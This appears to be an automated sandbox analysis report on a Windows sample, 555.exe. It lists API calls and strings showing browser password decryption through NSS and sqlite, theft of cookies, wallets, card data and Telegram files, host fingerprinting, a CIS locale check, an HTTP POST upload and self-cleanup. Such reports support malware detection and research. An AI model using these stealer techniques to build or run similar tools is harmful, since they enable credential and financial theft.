Instruction ID: 41e3e638de8cb1cf6545f0c5c1bc6b63933d3c010f270d44757dad562a285509
Opcode Fuzzy Hash: bd83a9c6e8fd16ede2735052553d0212380c5eb09d3c5b747094f6a2962ce230
Instruction Fuzzy Hash: DB018B70A013298ACF34AF2AE450AAEB3B4EF10315F96442FE4C056351CB3C89A1CF6C

Uniqueness

Uniqueness Score: -1.00%

Function 00419A40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 00419AC0: codecvt.LIBCPMTD ref: 00419B12

std::bad_exception::bad_exception.LIBCMTD ref: 00419A86
__CxxThrowException@8.LIBCMT ref: 00419A94

Part of subcall function 00422CB4: RaiseException.KERNEL32(?,?,00422CB3,B51EC2B3,?,?,?,?,00422CB3,B51EC2B3,00459510,004637F4,B51EC2B3), ref: 00422CF6

Strings

state_type too small, xrefs: 00419A7E

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowcodecvtstd::bad_exception::bad_exception
String ID: state_type too small
API String ID: 3329574249-2444441358
Opcode ID: af2651bafdff395ef503996227151a4adf8e673a478e1bb32c44373f452a4539
Instruction ID: bb44a0cefaf8dee53507f587650f7208c6f8d66eddff816c8b940750173a1ecc
Opcode Fuzzy Hash: af2651bafdff395ef503996227151a4adf8e673a478e1bb32c44373f452a4539
Instruction Fuzzy Hash: 65F0A9B4E00249ABCB04EF99C912BAEB774FB05710F10826BF820677C1C77C6906CB88

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 555.exePID: 6444, Parent PID: 6192COMMON

Execution Graph

Execution Coverage:	2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.2%
Total number of Nodes:	1269
Total number of Limit Nodes:	38

Executed Functions

Function 0040ADF5 Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 102
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 0040ADFC
__wgetenv.LIBCMT ref: 0040AE16
LoadLibraryA.KERNEL32(00000000,00411D33,C:\ProgramData), ref: 0040AE5A
GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 0040AE76
GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 0040AE83
GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 0040AE90
GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 0040AE9D
GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 0040AEAA
GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 0040AEB7
GetProcAddress.KERNEL32(00000000,sqlite3_open), ref: 0040AEC4
GetProcAddress.KERNEL32(00000000,sqlite3_prepare_v2), ref: 0040AED1
GetProcAddress.KERNEL32(00000000,sqlite3_step), ref: 0040AEDE
GetProcAddress.KERNEL32(00000000,sqlite3_column_text), ref: 0040AEEB

Part of subcall function 0045ABC9: __lock.LIBCMT ref: 0045ABD7
Part of subcall function 0045ABC9: __putenv_helper.LIBCMT ref: 0045ABE6

Strings

PK11_GetInternalKeySlot, xrefs: 0040AE85
PATH, xrefs: 0040AE11
sqlite3_column_text, xrefs: 0040AEE0
NSS_Init, xrefs: 0040AE70
NSS_Shutdown, xrefs: 0040AE78
sqlite3_open, xrefs: 0040AEB9
PK11_FreeSlot, xrefs: 0040AE92
\nss3.dll, xrefs: 0040AE4B
sqlite3_prepare_v2, xrefs: 0040AEC6
PK11_Authenticate, xrefs: 0040AE9F
PK11SDR_Decrypt, xrefs: 0040AEAC
PATH=, xrefs: 0040AE31
sqlite3_step, xrefs: 0040AED3

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: AddressProc$H_prolog3LibraryLoad__lock__putenv_helper__wgetenv
String ID: NSS_Init$NSS_Shutdown$PATH$PATH=$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$\nss3.dll$sqlite3_column_text$sqlite3_open$sqlite3_prepare_v2$sqlite3_step
API String ID: 811143491-2659835857
Opcode ID: d31cddab7f196f17641576058e3eafecc3389b39921ab0839b8278615e8fb1db
Instruction ID: 57dbef0f6028b390c16dc60ab970191fc190a828c775120d4f460081503118fc
Opcode Fuzzy Hash: d31cddab7f196f17641576058e3eafecc3389b39921ab0839b8278615e8fb1db
Instruction Fuzzy Hash: 3E31C4B1D40312BECB246FB66C8695F7EE9DB00B58311483FB508A31A1DB7C4944ABDD

Uniqueness

Uniqueness Score: -1.00%

Function 00407BAB Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 89
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004508D0: __EH_prolog3.LIBCMT ref: 004508EF
Part of subcall function 004508D0: _memset.LIBCMT ref: 0045091E
Part of subcall function 004508D0: GetUserDefaultLocaleName.KERNEL32(?,00000055,?,?,00000008), ref: 0045092C

Part of subcall function 004504E1: GetCurrentHwProfileA.ADVAPI32(?), ref: 00450505

Part of subcall function 0045053F: _memset.LIBCMT ref: 00450581
Part of subcall function 0045053F: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,00000000), ref: 0045059D
Part of subcall function 0045053F: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,?,?,00000000), ref: 004505BC
Part of subcall function 0045053F: RegCloseKey.ADVAPI32(?,?,00000000), ref: 004505C5
Part of subcall function 0045053F: CharToOemA.USER32 ref: 004505D6

CreateMutexA.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00407C6A
GetLastError.KERNEL32(00000001,00000000,00000001,00000000,00000001,00000000), ref: 00407C91

Strings

be-BY, xrefs: 00407BE2
ru-RU, xrefs: 00407C10
az-AZ, xrefs: 00407C27
uz-UZ, xrefs: 00407BF9
kk-KZ, xrefs: 00407BCB

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: _memset$CharCloseCreateCurrentDefaultErrorH_prolog3LastLocaleMutexNameOpenProfileQueryUserValue
String ID: az-AZ$be-BY$kk-KZ$ru-RU$uz-UZ
API String ID: 3409144020-1759449863
Opcode ID: 8782de16d5eafd32d46638a4130f3c7debdd0133f3b909079ed75db6d49c7eb6
Instruction ID: 5536ac99a5fe64b7c76912ee7b7b9df60b8f512e185b7d604bc309b89c174417
Opcode Fuzzy Hash: 8782de16d5eafd32d46638a4130f3c7debdd0133f3b909079ed75db6d49c7eb6
Instruction Fuzzy Hash: C321813190411479DB24EBB2DC46DEF7B38AF15369F50063FF116B60E1EA786604C6A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040A1D5 Relevance: 9.1, APIs: 6, Instructions: 86
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 0040A202

Part of subcall function 0045A16B: __FF_MSGBANNER.LIBCMT ref: 0045A184
Part of subcall function 0045A16B: __NMSG_WRITE.LIBCMT ref: 0045A18B
Part of subcall function 0045A16B: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,00457E26,00000001,00000000,?,?,?,00457E84,004010F0), ref: 0045A1B0

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040A215
CloseHandle.KERNEL32(00000000,?,00000001,00000000), ref: 0040A222
Process32First.KERNEL32(?,?), ref: 0040A233
Process32Next.KERNEL32 ref: 0040A294
FindCloseChangeNotification.KERNEL32(?,?,00000001,00000000), ref: 0040A2A0

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: CloseProcess32$AllocateChangeCreateFindFirstHandleHeapNextNotificationSnapshotToolhelp32_malloc
String ID:
API String ID: 2639979032-0
Opcode ID: 9ceda2f1fbdb69118529f846534141d33ee07d25fbae823d991514dd87ba14eb
Instruction ID: fe4e5556424e0a666644840a43a2d6530d8e4d08c05f65a755e18f23182be2d2
Opcode Fuzzy Hash: 9ceda2f1fbdb69118529f846534141d33ee07d25fbae823d991514dd87ba14eb
Instruction Fuzzy Hash: 2921C3319042488ADB309F75DC85AAEBFB5FF15308F24017EE855E7382EB3A5818CB46

Uniqueness

Uniqueness Score: -1.00%

Function 00411CE4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 00411CEE

Part of subcall function 0040ADF5: __EH_prolog3.LIBCMT ref: 0040ADFC
Part of subcall function 0040ADF5: __wgetenv.LIBCMT ref: 0040AE16
Part of subcall function 0040ADF5: LoadLibraryA.KERNEL32(00000000,00411D33,C:\ProgramData), ref: 0040AE5A
Part of subcall function 0040ADF5: GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 0040AE76
Part of subcall function 0040ADF5: GetProcAddress.KERNEL32(00000000,NSS_Shutdown), ref: 0040AE83
Part of subcall function 0040ADF5: GetProcAddress.KERNEL32(00000000,PK11_GetInternalKeySlot), ref: 0040AE90
Part of subcall function 0040ADF5: GetProcAddress.KERNEL32(00000000,PK11_FreeSlot), ref: 0040AE9D
Part of subcall function 0040ADF5: GetProcAddress.KERNEL32(00000000,PK11_Authenticate), ref: 0040AEAA
Part of subcall function 0040ADF5: GetProcAddress.KERNEL32(00000000,PK11SDR_Decrypt), ref: 0040AEB7
Part of subcall function 0040ADF5: GetProcAddress.KERNEL32(00000000,sqlite3_open), ref: 0040AEC4
Part of subcall function 0040ADF5: GetProcAddress.KERNEL32(00000000,sqlite3_prepare_v2), ref: 0040AED1
Part of subcall function 0040ADF5: GetProcAddress.KERNEL32(00000000,sqlite3_step), ref: 0040AEDE
Part of subcall function 0040ADF5: GetProcAddress.KERNEL32(00000000,sqlite3_column_text), ref: 0040AEEB

__wgetenv.LIBCMT ref: 00411D48
FindFirstFileW.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,00000000), ref: 00411DF3

Strings

APPDATA, xrefs: 00411D43
C:\ProgramData, xrefs: 00411D29

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: AddressProc$__wgetenv$FileFindFirstH_prolog3H_prolog3_catch_LibraryLoad
String ID: APPDATA$C:\ProgramData
API String ID: 1008642153-1249537770
Opcode ID: 3918a670b7035fbab602dafa51f803c0146e68cc95d35372736b668b55bde490
Instruction ID: 6758922a0011c98f0151d20aba6c59746473f58336b6894dd92a6876d3a58e8f
Opcode Fuzzy Hash: 3918a670b7035fbab602dafa51f803c0146e68cc95d35372736b668b55bde490
Instruction Fuzzy Hash: D23173B1D0026DAECB25DF55CD81BDEBB78AB18304F0040EEA60DA7241DA745BC48F69

Uniqueness

Uniqueness Score: -1.00%

Function 0040664E Relevance: 188.9, APIs: 51, Strings: 56, Instructions: 1614sleepfileCOMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(02521058,00000000,00000001,00000000,00000000,?,?,?,000003E0,00407CAA), ref: 00406652
SetCurrentDirectoryA.KERNEL32(02521058,?,?,?,000003E0,00407CAA), ref: 00406669
CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?,?,?,?,000003E0,00407CAA), ref: 0040668E
CreateDirectoryA.KERNEL32(00000000), ref: 00406760
CreateDirectoryA.KERNEL32(00000000), ref: 00406792
CreateDirectoryA.KERNEL32(00000000), ref: 004067C4

Part of subcall function 00401195: _memmove.LIBCMT ref: 004011B4

CreateDirectoryA.KERNEL32(00000000), ref: 004067FE
CreateDirectoryA.KERNEL32(00000000), ref: 00406830
__time64.LIBCMT ref: 00406926
__localtime64_s.LIBCMT ref: 00406939
_asctime_s.LIBCMT ref: 0040694B
_fprintf.LIBCMT ref: 00406982
_fprintf.LIBCMT ref: 004069A4

Part of subcall function 00404656: __EH_prolog3.LIBCMT ref: 0040465D

_fprintf.LIBCMT ref: 004069D2
_fprintf.LIBCMT ref: 00406A0B
GetCurrentProcessId.KERNEL32(00000001), ref: 00406A1E
_fprintf.LIBCMT ref: 00406A48
_fprintf.LIBCMT ref: 00406A7C
_fprintf.LIBCMT ref: 00406B0E
_fprintf.LIBCMT ref: 00406BAF
_fprintf.LIBCMT ref: 00406C27

Part of subcall function 004507E4: __EH_prolog3_GS.LIBCMT ref: 004507EE
Part of subcall function 004507E4: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00450806
Part of subcall function 004507E4: GetDeviceCaps.GDI32(00000000,00000008), ref: 0045081B
Part of subcall function 004507E4: GetDeviceCaps.GDI32(?,0000000A), ref: 0045082B
Part of subcall function 004507E4: ReleaseDC.USER32 ref: 00450836

_fprintf.LIBCMT ref: 00406C9F
_fprintf.LIBCMT ref: 00406D17
_fprintf.LIBCMT ref: 00406D8F
_fprintf.LIBCMT ref: 00406E07
_fprintf.LIBCMT ref: 00406E83
_fprintf.LIBCMT ref: 00406EE1
_fprintf.LIBCMT ref: 00406F3B

Part of subcall function 0044FF71: GetSystemInfo.KERNEL32(?), ref: 0044FF7F

_fprintf.LIBCMT ref: 00406FB3
_fprintf.LIBCMT ref: 0040702B
_fprintf.LIBCMT ref: 004070A7
_fprintf.LIBCMT ref: 00407105
_fprintf.LIBCMT ref: 00407135
_fprintf.LIBCMT ref: 004071A1
_fprintf.LIBCMT ref: 00407244

Part of subcall function 004045F2: __EH_prolog3.LIBCMT ref: 004045F9

_fprintf.LIBCMT ref: 004072B7
_fprintf.LIBCMT ref: 0040733D
_fprintf.LIBCMT ref: 004073DB

Part of subcall function 004013C6: _memmove.LIBCMT ref: 00401417

_fprintf.LIBCMT ref: 00407441
_fprintf.LIBCMT ref: 0040747D
_fprintf.LIBCMT ref: 004074C7
_fprintf.LIBCMT ref: 00407503
CreateDirectoryA.KERNEL32(00000000,?,?,?,?,http://ip-api.com/line/,?,00000000,00000000,00000000,00000000,00000000), ref: 0040755B
SetCurrentDirectoryA.KERNEL32(00000000,?,?,?,?,?,?,http://ip-api.com/line/,?,00000000,00000000,00000000,00000000,00000000), ref: 00407589
SetCurrentDirectoryA.KERNEL32(00000000,hwid,00000000,?,http://ip-api.com/line/,?,00000000,00000000,00000000,00000000,00000000), ref: 004077DE
CreateDirectoryA.KERNEL32(00000000), ref: 00407812

Part of subcall function 00408675: __EH_prolog3.LIBCMT ref: 0040867C

Part of subcall function 004055F5: __EH_prolog3.LIBCMT ref: 00405614
Part of subcall function 004055F5: __wgetenv.LIBCMT ref: 0040561E

Part of subcall function 00453394: __EH_prolog3_GS.LIBCMT ref: 0045339E

SetCurrentDirectoryA.KERNEL32(02521058,?,?,ccount,00000000,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 004078C7

Part of subcall function 0045341F: MultiByteToWideChar.KERNEL32(00000000,00000000,00000104,?,00000000,00000000,000003E8,?,00000000,?,?,?,004096C0,00000104,00000104,?), ref: 0045344E
Part of subcall function 0045341F: MultiByteToWideChar.KERNEL32(00000000,00000000,00000104,?,00000000,?,?,00000000,?,?,?,004096C0,00000104,00000104,?,?), ref: 0045347D

Sleep.KERNEL32(00014FF0,?,?,00000000,logs,?), ref: 00407B29
DeleteFileA.KERNEL32(?,?,?,00000000,logs,?), ref: 00407B68
SetCurrentDirectoryA.KERNEL32(C:\,?,?,00000000,logs,?), ref: 00407B73
ExitProcess.KERNEL32 ref: 00407BA4

Strings

hwid, xrefs: 004075C3
[Hardware], xrefs: 00406EB4
Display Language: , xrefs: 00406CE7
ISP: , xrefs: 00407384
IP: %s, xrefs: 0040712A
Path: %s , xrefs: 00406A3D
Keyboard Languages: , xrefs: 00406D5F
GUID: %s, xrefs: 004069FC
platform, xrefs: 00407637
Computer Name: , xrefs: 00406B7A
Work Dir: %s , xrefs: 00406A71
\files\Downloads, xrefs: 00406811
Processor: , xrefs: 00406F0B
\files\History, xrefs: 004067DF
logs, xrefs: 00407A86
Country: , xrefs: 00407145
user, xrefs: 004076AB
RAM: , xrefs: 00406FFB
\files\CC, xrefs: 004067A5
TimeZone: , xrefs: 00406E4F
[Network], xrefs: 004070D8
\files\Files, xrefs: 0040753F, 0040756B
5, xrefs: 004066E2
C:\, xrefs: 00407B6E
.zip, xrefs: 0040794F
VideoCard: , xrefs: 00407073
\files\Wallets, xrefs: 004077F6, 0040782D
\files\Autofill, xrefs: 00406741
), xrefs: 004073BB
CPU Count: , xrefs: 00406F83
*.*, xrefs: 004079E0
User Name: , xrefs: 00406BF7
\files\Cookies, xrefs: 00406773
\files, xrefs: 0040666F, 004077C3, 004079F2
cccount, xrefs: 004076EB
ver, xrefs: 004077A5
files\information.txt, xrefs: 0040690F
ccount, xrefs: 00407885
Windows: , xrefs: 00406AB2
Coordinates: , xrefs: 004072E4
City: , xrefs: 004071E8
Date: %s, xrefs: 00406999
tdh$^G, xrefs: 004067DD
ZIP: , xrefs: 0040728B
[Software], xrefs: 0040749F
Local Time: , xrefs: 00406DD7
profile, xrefs: 00407671
fcount, xrefs: 0040772B
MachineID: %s, xrefs: 004069C3
*, xrefs: 004066B4
L, xrefs: 00407AE8
[Processes], xrefs: 00407419
Display Resolution: , xrefs: 00406C6F
http://ip-api.com/line/, xrefs: 004068BE
Version: %s, xrefs: 00406977
telegram, xrefs: 0040776B

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: _fprintf$Directory$Create$Current$H_prolog3$ByteCapsCharDeviceH_prolog3_MultiProcessWide_memmove$DeleteExitFileInfoReleaseSleepSystem__localtime64_s__time64__wgetenv_asctime_s
String ID: [Software]$)$*.*$.zip$C:\$CPU Count: $City: $Computer Name: $Coordinates: $Country: $Date: %s$Display Language: $Display Resolution: $GUID: %s$IP: %s$ISP: $Keyboard Languages: $L$Local Time: $MachineID: %s$Path: %s $Processor: $RAM: $TimeZone: $User Name: $Version: %s$VideoCard: $Windows: $Work Dir: %s $ZIP: $[Hardware]$[Network]$[Processes]$\files$\files\Autofill$\files\CC$\files\Cookies$\files\Downloads$\files\Files$\files\History$\files\Wallets$cccount$ccount$fcount$files\information.txt$http://ip-api.com/line/$hwid$logs$platform$profile$tdh$^G$telegram$user$ver$ 5$*
API String ID: 196222843-3078277599
Opcode ID: 4942f22a83de693271a1aa11c5801ba954d7d6362de27dd12627d68a7706bd86
Instruction ID: 8fa4d021383edb074af931f2d8065d2c93b20bf3e1bf5c841cb2fbacecbd5952
Opcode Fuzzy Hash: 4942f22a83de693271a1aa11c5801ba954d7d6362de27dd12627d68a7706bd86
Instruction Fuzzy Hash: B4D27EB1801258AEDB15EB94DC85FEE7B7CAF15304F1040AFB509BB092EA785F44CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00413A3F Relevance: 72.5, APIs: 11, Strings: 30, Instructions: 762
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0045B5B2: __fsopen.LIBCMT ref: 0045B5BF

CreateDirectoryA.KERNEL32(?), ref: 00413A98
__wgetenv.LIBCMT ref: 0041415C
__wgetenv.LIBCMT ref: 00414226

Part of subcall function 004129C1: __EH_prolog3.LIBCMT ref: 004129E3
Part of subcall function 004129C1: __wgetenv.LIBCMT ref: 00412A35

Part of subcall function 0040FCFE: __EH_prolog3.LIBCMT ref: 0040FD1D
Part of subcall function 0040FCFE: __wgetenv.LIBCMT ref: 0040FD29
Part of subcall function 0040FCFE: CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?), ref: 0040FDD5
Part of subcall function 0040FCFE: CreateDirectoryA.KERNEL32(00000000,00000000,?,00000001,00000000,?,?,?), ref: 0040FE0C

Part of subcall function 0040A13F: _memset.LIBCMT ref: 0040A160
Part of subcall function 0040A13F: GetVersionExA.KERNEL32(?), ref: 0040A179

__wgetenv.LIBCMT ref: 00414306

Part of subcall function 0040C85C: LoadLibraryA.KERNEL32 ref: 0040C88D
Part of subcall function 0040C85C: GetProcAddress.KERNEL32(00000000), ref: 0040C8AE
Part of subcall function 0040C85C: GetProcAddress.KERNEL32(00000000), ref: 0040C8BC
Part of subcall function 0040C85C: GetProcAddress.KERNEL32(00000000), ref: 0040C8CA
Part of subcall function 0040C85C: GetProcAddress.KERNEL32(00000000), ref: 0040C8D8
Part of subcall function 0040C85C: GetProcAddress.KERNEL32(00000000), ref: 0040C8E6

_fprintf.LIBCMT ref: 004144A2
DeleteFileA.KERNEL32(C:\ProgramData\freebl3.dll,00000001,00000001,00000001,00000001,00000001,00000001,00000001,00000001,00000001,00000001,00000001,00000001,00000001,00000001,00000001), ref: 004144D2
DeleteFileA.KERNEL32(C:\ProgramData\mozglue.dll,?,00000001,?,00000001,?,00000000,00000001,?,00000000,00000001,?,00000000,00000001,?,00000000), ref: 004144D9
DeleteFileA.KERNEL32(C:\ProgramData\msvcp140.dll,?,00000001,?,00000001,?,00000000,00000001,?,00000000,00000001,?,00000000,00000001,?,00000000), ref: 004144E0
DeleteFileA.KERNEL32(C:\ProgramData\nss3.dll,?,00000001,?,00000001,?,00000000,00000001,?,00000000,00000001,?,00000000,00000001,?,00000000), ref: 004144E7
DeleteFileA.KERNEL32(C:\ProgramData\softokn3.dll,?,00000001,?,00000001,?,00000000,00000001,?,00000000,00000001,?,00000000,00000001,?,00000000), ref: 004144EE
DeleteFileA.KERNEL32(C:\ProgramData\vcruntime140.dll,?,00000001,?,00000001,?,00000000,00000001,?,00000000,00000001,?,00000000,00000001,?,00000000), ref: 004144F5

Strings

/softokn3.dll, xrefs: 00413D80
LOCALAPPDATA, xrefs: 00414220, 00414225, 00414305
*.txt, xrefs: 004141EA, 00414382
/vcruntime140.dll, xrefs: 00413E2D
files\passwords.txt, xrefs: 00413A44
C:\ProgramData\nss3.dll, xrefs: 004144E2
\softokn3.dll, xrefs: 00413DD1
files\cookie_list.txt, xrefs: 00414419
C:\ProgramData\freebl3.dll, xrefs: 004144CD
/msvcp140.dll, xrefs: 00413C26
\nss3.dll, xrefs: 00413D24
files\Cookies\Edge_Cookies.txt, xrefs: 00414295, 0041429D, 00414365
\freebl3.dll, xrefs: 00413B1D
/freebl3.dll, xrefs: 00413ACC
C:\ProgramData\vcruntime140.dll, xrefs: 004144F0
\msvcp140.dll, xrefs: 00413C77
*.cookie, xrefs: 004142BA
C:\ProgramData\, xrefs: 00413A5B
C:\ProgramData\mozglue.dll, xrefs: 004144D4
/nss3.dll, xrefs: 00413CD3
%s, xrefs: 0041449C
\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\, xrefs: 0041424A, 00414318
\mozglue.dll, xrefs: 00413BCA
C:\ProgramData\msvcp140.dll, xrefs: 004144DB
files\Cookies\IE_Cookies.txt, xrefs: 004141CD
\vcruntime140.dll, xrefs: 00413E7E
/mozglue.dll, xrefs: 00413B79
C:\ProgramData\softokn3.dll, xrefs: 004144E9
APPDATA, xrefs: 00414157
\Microsoft\Windows\Cookies\Low\, xrefs: 0041417E

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: DeleteFile$AddressProc__wgetenv$CreateDirectory$H_prolog3$LibraryLoadVersion__fsopen_fprintf_memset
String ID: %s$*.cookie$*.txt$/freebl3.dll$/mozglue.dll$/msvcp140.dll$/nss3.dll$/softokn3.dll$/vcruntime140.dll$APPDATA$C:\ProgramData\$C:\ProgramData\freebl3.dll$C:\ProgramData\mozglue.dll$C:\ProgramData\msvcp140.dll$C:\ProgramData\nss3.dll$C:\ProgramData\softokn3.dll$C:\ProgramData\vcruntime140.dll$LOCALAPPDATA$\Microsoft\Windows\Cookies\Low\$\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\$\freebl3.dll$\mozglue.dll$\msvcp140.dll$\nss3.dll$\softokn3.dll$\vcruntime140.dll$files\Cookies\Edge_Cookies.txt$files\Cookies\IE_Cookies.txt$files\cookie_list.txt$files\passwords.txt
API String ID: 2214152947-463045474
Opcode ID: 85e2559e6888e17d97d9f33e6118d057db5e1fe00285780dedfa6476aca1130c
Instruction ID: c888008e5eab2c021177ab4da1e3cdb911c3fe199873e3249f396f40a264146c
Opcode Fuzzy Hash: 85e2559e6888e17d97d9f33e6118d057db5e1fe00285780dedfa6476aca1130c
Instruction Fuzzy Hash: 5C52E370900258EEDB15EB61CC45FED7B79EB55308F0440AFF405772A2DB791A88CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00409C07 Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 275
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 00409C26
__cftof.LIBCMT ref: 00409CE8
InternetOpenA.WININET(0000002F,00000000,?,00000000,00000000), ref: 00409D03
InternetSetOptionA.WININET(00000000,00000041,?,00000004), ref: 00409D2A
InternetConnectA.WININET(00000010,00000000,00000050,?,?,00000003,00000000,00000001), ref: 00409D49
InternetSetOptionA.WININET(00000000,00000041,00000001,00000000), ref: 00409D60
HttpOpenRequestA.WININET(00000010,POST,?,00000000,00000000,00000000,00400000,00000001), ref: 00409D81
HttpAddRequestHeadersA.WININET(00000000,?,?,20000000), ref: 00409DDB
__itow_s.LIBCMT ref: 00409DEF
HttpAddRequestHeadersA.WININET(00000000,?,?,20000000), ref: 00409E3E
HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 00409E4C
HttpQueryInfoA.WININET(00000000,0000002E,?,?,00000000), ref: 00409E69
InternetCloseHandle.WININET(00000000), ref: 00409E74
__cftof.LIBCMT ref: 00409EA0
InternetOpenUrlA.WININET(00000010,00000000,00000000,00000000,00400000,00000000), ref: 00409EB4
InternetCloseHandle.WININET(00000000), ref: 00409EC9
InternetCloseHandle.WININET(00000010), ref: 00409EDD
InternetCloseHandle.WININET(00000010), ref: 00409EE6

Part of subcall function 0040948C: __EH_prolog3_GS.LIBCMT ref: 00409493
Part of subcall function 0040948C: HttpAddRequestHeadersA.WININET(00000004,00000000,00000000,20000000), ref: 004094DA
Part of subcall function 0040948C: HttpAddRequestHeadersA.WININET(00000004,00000000,00000000,20000000), ref: 004094FD
Part of subcall function 0040948C: HttpAddRequestHeadersA.WININET(00000004,00000000,00000000,20000000), ref: 00409520
Part of subcall function 0040948C: HttpAddRequestHeadersA.WININET(00000004,00000000,00000000,20000000), ref: 00409543

Strings

http://, xrefs: 00409C86
POST, xrefs: 00409D79
Content-Length: , xrefs: 00409DF9
http, xrefs: 00409E84
